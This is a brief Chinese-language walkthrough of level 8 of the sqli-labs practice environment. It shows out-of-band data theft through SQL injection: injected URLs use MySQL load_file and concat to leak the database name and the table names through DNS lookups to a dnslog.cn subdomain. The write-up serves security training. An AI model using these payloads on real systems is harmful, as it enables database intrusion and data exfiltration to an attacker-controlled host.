dnslog带出——sqli-labs第8关

进入关卡

另外打开一个新的页面，进入dnslog.cn 点击Get SubDomain，得到一个随机分配的子域名。 （每次点击都会重新生成一个随机的子域名，所以避免误点）

库名

回到第8关，在URL里输入payload，刷新一下

http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\",database(),".uifm3e.dnslog.cn\xxx.txt"))--+

"\\" 四个不能少

注意.uifm3e.dnslog.cn是你的子域名，前面要加个.。

后面的\xxx.txt，\是必须的，xxx.txt这部分随便是什么内容，不能为空。

然后在dnslog.cn里面点击Refresh Record，库名信息就会出现了

表名

http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".uifm3e.dnslog.cn\xsy.txt"))--+

查找列名等其他信息的payload可以参考前面几关，就不在这里多说了

…………………………

要注意，在dnslog.cn上只适合联系靶场，你所查找的信息该网站肯定会有记录的。 不过可以自己搭一个DNSlog平台 https://github.com/bugscanteam/dnslog/